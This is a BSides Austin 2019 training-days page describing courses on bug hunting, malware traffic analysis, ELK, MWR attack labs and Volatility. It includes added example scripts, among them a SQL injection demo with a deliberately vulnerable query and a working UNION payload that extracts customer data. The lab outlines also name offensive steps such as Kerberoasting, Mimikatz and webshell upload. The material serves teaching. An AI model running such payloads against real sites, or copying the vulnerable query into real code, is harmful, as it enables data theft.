BSides Austin 2019 Training Days
In celebration of our event’s 10th anniversary, we are working to make it extra special for our attendees. The most significant way we could think of to make our security community even happier and smarter by the end of our event was to add more in-depth opportunities for learning. To a security community known for its hunger for more, we introduce the BSides Austin 2019 Training Days—two days of low-cost training classes that provide deeper learning on technical and management subjects.
Because this is our first attempt at offering courses, we will be monitoring the security community’s response to the idea. If all goes well we will consider offering this again, so please let us know you like this concept by signing up for a class and/or telling your friends and colleagues!
Our courses will run on Tuesday and Wednesday, March 26-27, right before the BSides Austin conference on March 28-29. (Tickets to the conference are sold separately.) Food and beverages are not provided, but the facility has a cafeteria.
Tuesday, March 26 | Commons Learning Center on the J.J. Pickle Research Campus on Burnet Road
- Bug Hunting: Day one of two-day course taught by Zef Cekaj and Jason Randall
- 9:00 am – 5:00 pm (REGISTER for $200) (read the requirements carefully)
- Malware Traffic Analysis Workshop: One-day course taught by Brad Duncan
- 9:00 am – 5:00 pm (REGISTER for $100)
- Effective Security Leader Training: A Business-Driven Approach with Practical Management Techniques: Half-day course taught by Philip J. Beyer
- 8:30 am – 12:30 pm (REGISTER for $50)
- Parsing Logs via ELK: Half-day course taught by Mark McLauchlin
- 1:00 – 5:00 pm (REGISTER for $50)
Wednesday, March 27 | Commons Learning Center on the J.J. Pickle Research Campus on Burnet Road
- Bug Hunting: Day two of two-day course taught by Zef Cekaj and Jason Randall
- 9:00 am – 5:00 pm (Register link is above) (read the requirements carefully)
- MWR Playground Labs: One-day course taught by Cale Black
- 9:00 am – 5:00 pm (REGISTER for $100)
- Incident Response with Volatility Framework: One-day course taught by Evan Wagner
- 9:00 am – 5:00 pm (REGISTER for $100)
Bug Hunting
This two-day course covers a real audit and discovery of vulnerabilities in enterprise software. If you’ve ever wanted to learn how CVEs are made, or would just like to participate in a guided group audit of an enterprise application, this is your class. We will cover basic reverse engineering and debugging, some scripting, a few pro tips, and next steps.
Laptop, IDA Pro (note: the freeware version does not support the IDAPython plugin; this is not a huge component of the course, and scripts and results will be reviewed). Prospective students should have basic x86 assembly fluency. Previous debugging experience is also required; our debugger of choice for this class will be WinDbg. Programming experience is required, preferably in Python, as the class will develop IDAPython scripts to aid in reverse engineering.
Jason Randall is a senior vulnerability researcher at Raytheon CSI where he specializes in the macOS and iOS platforms, with his most recent focus on the XNU kernel. Jason has worked on various targets, from embedded devices to “other” things that may fly, float, or drive. He enjoys developing tools that aid in vulnerability research and exploitation, such as heap visualizers or IPC man-in-the-middle tools. Jason also likes video games; you may find him dumping hours into WoW or Overwatch.
Zef Cekaj is a senior vulnerability researcher at Raytheon CSI specializing in binary reversing and vulnerability discovery. He has reversed and documented hundreds of vulnerabilities in various target software. He has developed exploit chains for many of them. His primary interests are in the exploitation of server side vulnerabilities and mitigation circumvention.
Malware Traffic Analysis Workshop
This one-day workshop provides a foundation for investigating pcaps of malicious network traffic. We begin with basic investigation concepts, setting up Wireshark, and identifying hosts or users in network traffic. Participants then learn characteristics of malware infections and other suspicious network traffic. The workshop covers techniques for determining the root cause of an infection and false-positive alerts. We conclude with an evaluation designed to give participants experience in writing an incident report.
Technical person at a beginner to intermediate level (good for new security analysts)
Laptop running a non-Windows environment (a VM will work for this) with a recent version of Wireshark installed (version 2.2 or later)
After 21 years of classified intelligence work for the US Air Force, Brad transitioned to cyber security in 2010, and he is currently a Threat Intelligence Analyst for Palo Alto Networks Unit 42. Brad specializes in network traffic analysis. He is also a handler for the Internet Storm Center (ISC) and has posted more than 140 diaries at isc.sans.edu. Brad routinely blogs technical details and analysis of infection traffic at www.malware-traffic-analysis.net, where he provides traffic analysis exercises and over 1,600 malware and pcap samples to a growing community of information security professionals.
Effective Security Leader Training: A Business-Driven Approach with Practical Management Techniques
Being an effective security leader is a challenging prospect. As demand for security professionals increases, technical contributors find themselves thrust into management and leadership positions. Often these contributors feel poorly equipped for their new roles. Unfortunately, they grapple for answers, resources, and support in a haphazard way, lacking clarity or effective practices.
This training outlines a method of practice which produces professional value over time. It addresses the differences between technical contribution and management, and between management and leadership. The intended audience are those hungry for guidance, those starting to figure things out the hard way, and those who simply want to deliver outstanding value to their employers and the security profession.
The topics include concrete recommendations about how to communicate with peers, increase influence with executives, build relationships with one’s team, introduce risk to the decision-making process, and streamline business innovation. If you’re ready to meet others who are wrestling with similar issues and are driven to perform as a leader, let’s get started.
- Identify the skills necessary to transition to management.
- Determine a path for professional growth.
- Identify the skills necessary to improve management results.
- Identify the skills necessary to retain talented employees.
- Determine an ongoing method of practice for skill development.
- Identify the skills to seek in a security leader.
- Determine how to cultivate effective security practices.
Philip J. Beyer
Philip Beyer is the Vice President of Security Engineering for TSYS. He leads the teams building solutions to protect customer and card-holder data.
Mr. Beyer is mission-driven to guide security leaders to higher effectiveness. His company Getting Security Done supports professionals with business communication and value creation training. He co-founded the Texas CISO Council, a regional committee that develops free strategic resources for security leaders.
As the Senior Director of Information Security for The Advisory Board Company, Mr. Beyer led the prevention, detection, and response programs for a firm improving the performance of 5,500+ health care organizations and educational institutions around the world. As the Information Security Officer for the Texas Education Agency, he protected data for 1200 school districts, 5 million active students, and 1 million employees. As a Lead Consultant for Denim Group, he led security assessments, improved risk management practices, developed detection and response capabilities, and strengthened information security programs for a variety of businesses and Fortune 100 clients.
During Mr. Beyer’s presidency, the ISSA Capitol of Texas Chapter (Austin ISSA) was recognized as Chapter of the Year in 2013. He holds a BS degree in Physics from Trinity University and the CISSP certification. Outside the office he is a martial artist and ultra-marathon runner.
Parsing Logs via ELK
ELK (Elasticsearch, Logstash, Kibana) is a powerful open source search stack. Often overlooked is the parsing functionality it provides to enrich security event log data. This hands-on training will go over the ELK stack, including installation and configuration of Filebeat, Logstash, Elasticsearch, and Kibana, along with some best practices. A good portion of the time will be spent parsing log events with Logstash. Logstash is referred to as the Swiss army knife of log parsing, and deservedly so: it has some very powerful capabilities for slicing and dicing events so they are more useful when searching for the needle in the stack of needles. Additionally, Logstash supports 50+ outputs. Even though Logstash is typically associated with Elasticsearch, it can send parsed event data to many other technologies, such as DataDog, Graylog, Kafka, S3, etc. No prior knowledge of ELK is expected or required.
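Most of the parsing time in Logstash goes into writing grok patterns, and it helps to be able to test one against sample lines without a running pipeline. The Python script below is an added example, not material from the course or from Elastic: it implements a small subset of grok's pattern expansion (Logstash ships a far larger pattern library), runs a pattern for OpenSSH "Failed password" lines over constructed auth.log lines, tags non-matching lines the way the grok filter does with _grokparsefailure, and mirrors a conditional output block that sends every event to one sink and only tagged events to a second. The sample lines, field names and sink names are assumptions made for the example; the pattern string itself is the kind that goes into a grok filter's match option unchanged.

```python
import re
from collections import Counter

# A small subset of the stock grok pattern library, written out here for the
# example; Logstash ships a much larger one (patterns/grok-patterns).
GROK_PATTERNS = {
    "MONTH": r"\b(?:Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec)\b",
    "MONTHDAY": r"(?:0?[1-9]|[12][0-9]|3[01])",
    "TIME": r"(?:[01]?[0-9]|2[0-3]):[0-5][0-9]:[0-5][0-9]",
    "SYSLOGTIMESTAMP": r"%{MONTH} +%{MONTHDAY} %{TIME}",
    "HOSTNAME": r"[A-Za-z0-9][A-Za-z0-9_.-]*",
    "POSINT": r"[1-9][0-9]*",
    "USERNAME": r"[A-Za-z0-9._-]+",
    "IP": r"(?:[0-9]{1,3}\.){3}[0-9]{1,3}",
}
GROK_REF = re.compile(r"%\{(\w+)(?::(\w+))?\}")


def grok_to_regex(pattern):
    """Expand %{NAME} and %{NAME:field} references recursively into a Python
    regex; references with a field name become named capture groups."""
    def repl(m):
        name, field = m.group(1), m.group(2)
        inner = grok_to_regex(GROK_PATTERNS[name])
        return f"(?P<{field}>{inner})" if field else f"(?:{inner})"
    return GROK_REF.sub(repl, pattern)


# Pattern for OpenSSH failed-login lines (the "invalid user " prefix is optional).
SSH_FAILED = (r"%{SYSLOGTIMESTAMP:timestamp} %{HOSTNAME:host} sshd\[%{POSINT:pid}\]: "
              r"Failed password for (?:invalid user )?%{USERNAME:user} "
              r"from %{IP:src_ip} port %{POSINT:src_port} ssh2")

# Constructed sample auth.log lines (not real traffic).
SAMPLE_LINES = [
    "Mar 26 09:14:02 bastion sshd[2114]: Failed password for invalid user admin from 203.0.113.45 port 51322 ssh2",
    "Mar 26 09:14:05 bastion sshd[2114]: Failed password for root from 203.0.113.45 port 51330 ssh2",
    "Mar 26 09:14:09 bastion sshd[2120]: Accepted publickey for deploy from 198.51.100.7 port 40122 ssh2: RSA SHA256:c0ffee",
]


def parse_auth_log(lines, pattern=SSH_FAILED):
    """Apply the pattern to each line. Matches become events carrying the
    captured fields plus a tag; misses keep the raw message and get the
    _grokparsefailure tag, which is what Logstash's grok filter does."""
    rx = re.compile(grok_to_regex(pattern))
    events = []
    for line in lines:
        m = rx.search(line)
        if m:
            ev = m.groupdict()
            ev["invalid_user"] = "invalid user" in line
            ev["tags"] = ["ssh_failed_login"]
        else:
            ev = {"message": line, "tags": ["_grokparsefailure"]}
        events.append(ev)
    return events


def route(events):
    """Stand-in for a conditional output block: every event goes to the search
    index, and tagged failed logins also go to an alert topic (sink names assumed)."""
    sinks = {"elasticsearch": [], "kafka": []}
    for ev in events:
        sinks["elasticsearch"].append(ev)
        if "ssh_failed_login" in ev["tags"]:
            sinks["kafka"].append(ev)
    return sinks


def failed_by_source(events):
    """Count failed logins per source address, the first pivot an analyst wants."""
    return Counter(ev["src_ip"] for ev in events if "src_ip" in ev)


if __name__ == "__main__":
    evs = parse_auth_log(SAMPLE_LINES)
    for ev in evs:
        print(ev)
    print(failed_by_source(evs))
```

The third sample line is the kind of event that silently falls through a pattern written only for failures; in a real pipeline you would either add a second grok pattern for accepted logins or watch the _grokparsefailure count in Kibana to catch drift in log formats.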
Anyone interested in logging
Laptop with a Linux OS or VM
I am on a team that manages a large ELK stack at a Fortune 10 company. I have developed training guides and videos for end users and assist in on-boarding logs and troubleshooting any issues teams may encounter.
MWR Playground Labs
MWR will be giving participants access to their cloud-based training labs: The Playground. These challenges will help equip security professionals (both defensive and offensive) with the expertise to defend their network and applications by better understanding how they are attacked and exploited.
The two Playground challenges are listed below.
Active Directory Hacking:
This lab will walk you through a full compromise of an Active Directory environment. This will involve utilizing the following skills:
- Delivery and execution of payloads via phishing emails, using Metasploit, PowerShell Empire and Cobalt Strike
- Persistence, privilege escalation and pivoting within the environment
- Enumeration of Active Directory environments (PowerView, BloodHound, ADOffline)
- Exploitation of Group Policy Preferences (GPP)
- SPN enumeration and Kerberoasting
- Mimikatz / Incognito
- Windows password cracking
Web App SQL Injection:
This lab will teach you some of the basics of web app exploitation. Most notably you will:
- Identify a SQL injection vulnerability
- Exploit the vulnerability to exfiltrate customer data
- Exploit a vulnerability to exfiltrate files from disk
- Upload a webshell to the server to gain RCE (Remote Code Execution)
These labs are great for those on the defensive side of security who are looking to better understand how attackers can compromise their networks and applications. Similarly, they are great for those on the offensive side of security who are less familiar with these techniques. A basic to intermediate understanding of web applications and Active Directory will be helpful.
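To make the first two bullets of the SQL injection lab concrete, the Python script below is an added example, not code from MWR's Playground: a constructed SQLite schema with a products table the application searches and a customers table the attacker is after, the search built by string concatenation beside its parameterised form, a boolean-differential probe that tells the two apart (lab step 1), and the UNION payload that pulls the customers table out through the vulnerable search (lab step 2). Table and column names are invented. The file-read and webshell steps depend on the target database engine and web server and are not reproduced here.

```python
import sqlite3

# Constructed sample schema for the lab: a product search the application
# exposes, and a customers table the attacker wants. Names are invented.
SCHEMA = """
CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT, category TEXT);
CREATE TABLE customers(id INTEGER PRIMARY KEY, email TEXT, card_last4 TEXT);
INSERT INTO products(name, category) VALUES ('Widget', 'tools'), ('Gadget', 'tools'), ('Mug', 'kitchen');
INSERT INTO customers(email, card_last4) VALUES ('alice@example.com', '4242'), ('bob@example.com', '0005');
"""


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def search_vulnerable(conn, category):
    """Deliberately vulnerable: the user-controlled value is spliced into the
    SQL text, so a quote in it changes the structure of the statement."""
    sql = "SELECT name, category FROM products WHERE category = '" + category + "'"
    return conn.execute(sql).fetchall()


def search_fixed(conn, category):
    """Hardened: the value is bound as a parameter and never parsed as SQL."""
    sql = "SELECT name, category FROM products WHERE category = ?"
    return conn.execute(sql, (category,)).fetchall()


def looks_injectable(conn, search):
    """Lab step 1 (identify): a boolean-differential probe. Two inputs that
    differ only in an injected predicate give different results when the
    input reaches the SQL parser, and identical (empty) results when it is
    treated as data."""
    true_rows = search(conn, "tools' AND '1'='1")
    false_rows = search(conn, "tools' AND '1'='2")
    return true_rows != false_rows


# Lab step 2 (exfiltrate): a UNION with the same column count as the original
# SELECT (two) pulls rows from an unrelated table through the product search.
# The trailing -- comments out the application's own closing quote.
UNION_PAYLOAD = "x' UNION SELECT email, card_last4 FROM customers--"


def steal_customers(conn, search):
    """Run the UNION payload through the given search function; sorted so the
    result does not depend on how the engine orders UNION output."""
    return sorted(search(conn, UNION_PAYLOAD))


if __name__ == "__main__":
    conn = build_db()
    for label, fn in (("vulnerable", search_vulnerable), ("fixed", search_fixed)):
        print(label, "injectable:", looks_injectable(conn, fn))
        print(label, "UNION payload returns:", steal_customers(conn, fn))
```

The probe is deliberately the boolean form rather than a lone quote: an application that swallows database errors still leaks the difference between the two predicates, which is also why the fixed version is judged by behaviour (both probes return nothing) rather than by the absence of an error message.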
Laptop with Kali Linux installed
Cale is a general computer security enthusiast and internet denizen who has spent the last few years working on the blue team as a UNIX systems administrator and on the red team as a penetration tester. He works with MWR InfoSecurity as a consultant and general trouble maker. If it moves bits and bytes, he wants to tear it apart and put it back together.
Incident Response with Volatility Framework
- What is Volatility Framework
  - Supported Formats
  - Profiles / Debug Symbols / PDBs
  - Operating Systems and Builds
  - Plugin Concepts
  - GitHub Repository
  - Distro Packages
  - Rekall Fork
- Why use Volatility
  - Considerations and experiences from in the field
- How to
  - Capture Memory
    - Physical Memory
    - Hibernation Files
    - Page/Swap Space
    - Virtual Machine Snapshots and VMEM
    - Converting a VMware Suspend Snapshot into a memory dump
    - Space considerations
    - Using the [lin|osx|win]pmem tool
  - Working with Image Formats
    - What is compatible and what is not
    - AFF4 format
    - Extracting AFF4 streams into RAW memory files
  - Extracting Volatility Framework
  - Basic usage information
    - Determine OS Build Profile
    - Comparing process discovery plugins and results
    - Identifying parent processes in execution tree
    - Listing process threads
    - Process ownership SIDs
    - Extracting processes out of dump
    - Performing static analysis on extracted processes
  - Network Connections and Sockets
    - Connection scanning plugins
    - Identifying suspect process based on indicator(s)
  - Objects and Files
    - Concept of Handles
    - DLLs and loaded/unloaded modules
    - Scanning for files
    - Searching by filename/type
    - Extracting files from the image
  - Exposing Secrets and Keys
    - Finding Certificates
    - Dumping NTLM/LM Hashes
    - Dumping cached Domain hashes
    - Dumping decrypted LSA passwords
  - Operational Items
    - Display Clipboard
    - Environment Variables
    - Finding Services
    - Output Format options
    - Creating Searchable Timeline
  - What is Yara
  - How to use Yara
  - Finding Malware
    - Memory protection violations
    - Command line console history
    - Finding hooks
    - Using Yara to find processes associated to indicators
  - Extending functionality
    - Adding Plugins
- Real World Exercises
  - Will be given scenarios and VMs/Memory dumps to identify what happened
  - Finish up the class with extra challenges and prizes
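Two of the "Basic usage" items above, comparing process discovery plugins and identifying parent processes in the execution tree, are the checks most analysts run first on a Windows dump. The Python script below is an added example, not material from the class or from the Volatility project: it parses constructed pslist and psscan output in Volatility 2's text layout, diffs the two to find a process that psscan carved from memory but that the linked list no longer reaches, and walks PPID links to flag a core Windows process with an unexpected parent and shells descended from an Office application. Process names, PIDs, offsets and the expected-parent table are constructed for the example, and the real plugins print more columns than are shown here.

```python
import re
from collections import namedtuple

Proc = namedtuple("Proc", "name pid ppid exited")

# Constructed sample output in the layout of Volatility 2's pslist (walks the
# kernel's active-process list) and psscan (carves _EPROCESS structures out of
# physical memory). Trailing columns are trimmed; only the first four columns
# and the psscan timestamps are parsed. The unlinked 'updater.exe' and the
# Office-to-shell chain are the planted findings.
PSLIST = """\
Offset(V)          Name                    PID   PPID   Thds     Hnds
------------------ -------------------- ------ ------ ------ --------
0xfffffa8001234560 System                    4      0     86      512
0xfffffa8001890b30 smss.exe                268      4      2       29
0xfffffa8001b3c7f0 wininit.exe             392    340      3       76
0xfffffa8001c19b30 services.exe            480    392      7      210
0xfffffa8001c23060 lsass.exe               496    392      8      634
0xfffffa8001d0a060 svchost.exe             600    480     11      380
0xfffffa8001e55b30 explorer.exe           1432   1404     28      870
0xfffffa8002011060 WINWORD.EXE            2204   1432     14      512
0xfffffa800205f7f0 cmd.exe                2380   2204      1       22
0xfffffa80020a1b30 powershell.exe         2412   2380      6      310
0xfffffa80020f2060 svchost.exe            2588   2412      3       80
"""
PSSCAN = """\
Offset(P)          Name                PID   PPID Time created                   Time exited
------------------ ---------------- ------ ------ ------------------------------ ------------------------------
0x000000003e234560 System                4      0 2019-03-27 08:59:01 UTC+0000
0x000000003e890b30 smss.exe            268      4 2019-03-27 08:59:02 UTC+0000
0x000000003eb3c7f0 wininit.exe         392    340 2019-03-27 08:59:05 UTC+0000
0x000000003ec19b30 services.exe        480    392 2019-03-27 08:59:06 UTC+0000
0x000000003ec23060 lsass.exe           496    392 2019-03-27 08:59:06 UTC+0000
0x000000003ed0a060 svchost.exe         600    480 2019-03-27 08:59:07 UTC+0000
0x000000003f1a0b30 userinit.exe       1404   1380 2019-03-27 09:01:10 UTC+0000   2019-03-27 09:01:20 UTC+0000
0x000000003ee55b30 explorer.exe       1432   1404 2019-03-27 09:01:12 UTC+0000
0x000000003f011060 WINWORD.EXE        2204   1432 2019-03-27 09:14:40 UTC+0000
0x000000003f05f7f0 cmd.exe            2380   2204 2019-03-27 09:14:58 UTC+0000
0x000000003f0a1b30 powershell.exe     2412   2380 2019-03-27 09:14:59 UTC+0000
0x000000003f0f2060 svchost.exe        2588   2412 2019-03-27 09:15:03 UTC+0000
0x000000003f6c2060 updater.exe        3120    600 2019-03-27 09:15:30 UTC+0000
"""
PS_ROW = re.compile(r"^(0x[0-9a-f]+)\s+(\S+)\s+(\d+)\s+(\d+)(.*)$")
TIMESTAMP = re.compile(r"\d{4}-\d\d-\d\d \d\d:\d\d:\d\d UTC\+0000")


def parse_ps(text):
    """Parse either listing into {(name, pid): Proc}. Keying on (name, pid)
    rather than offset matters: pslist prints virtual offsets, psscan physical."""
    procs = {}
    for line in text.splitlines():
        m = PS_ROW.match(line)
        if not m:
            continue  # header and separator lines
        _, name, pid, ppid, rest = m.groups()
        exited = len(TIMESTAMP.findall(rest)) >= 2  # both created and exited present
        procs[(name, int(pid))] = Proc(name, int(pid), int(ppid), exited)
    return procs


def hidden_processes(pslist, psscan):
    """Carved by psscan, absent from the linked list, and not exited: the sign
    of an _EPROCESS unlinked from the active-process list (DKOM). Exited
    processes also appear only in psscan, so they are filtered out."""
    return sorted(p for key, p in psscan.items() if key not in pslist and not p.exited)


EXPECTED_PARENT = {"smss.exe": "System", "services.exe": "wininit.exe",
                   "lsass.exe": "wininit.exe", "svchost.exe": "services.exe"}
OFFICE_APPS = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "OUTLOOK.EXE"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}


def lineage(procs, pid):
    """Process names from the oldest resolvable ancestor down to pid. The chain
    stops at a PPID with no live entry, which is normal for explorer.exe
    (userinit.exe exits after logon) and for wininit.exe."""
    by_pid = {p.pid: p for p in procs.values()}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid].name)
        pid = by_pid[pid].ppid
    return chain[::-1]


def parent_anomalies(procs):
    """Two parent-tree checks: core Windows processes with the wrong parent,
    and shells whose ancestry includes an Office application."""
    by_pid = {p.pid: p for p in procs.values()}
    findings = []
    for p in procs.values():
        parent = by_pid.get(p.ppid)
        want = EXPECTED_PARENT.get(p.name)
        if want and (parent is None or parent.name != want):
            got = parent.name if parent else f"missing pid {p.ppid}"
            findings.append(f"{p.name} ({p.pid}) parent is {got}, expected {want}")
        chain = lineage(procs, p.pid)
        if p.name in SHELLS and OFFICE_APPS & set(chain[:-1]):
            findings.append(f"{p.name} ({p.pid}) descends from Office: " + " > ".join(chain))
    return findings


if __name__ == "__main__":
    pslist, psscan = parse_ps(PSLIST), parse_ps(PSSCAN)
    for p in hidden_processes(pslist, psscan):
        print(f"hidden: {p.name} ({p.pid}) parent pid {p.ppid}")
    for finding in parent_anomalies(pslist):
        print("anomaly:", finding)
```

Against real dumps, feed the script the saved text output of the two plugins and expect noise from the exited-process filter on long-running systems; the point of running psscan alongside pslist is precisely that the two disagree, and the analyst's job is to explain every difference.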
- Laptop with enough free space to work with 8GB+ memory dumps
- Virtualization hypervisor to run Kali or REMnux
You will be provided a USB drive with:
- Slides from the presentation
- Example memory dumps
- Scripts to convert memory images
- Example automation scripts
Evan is a Sr. Incident Response Specialist with Walmart.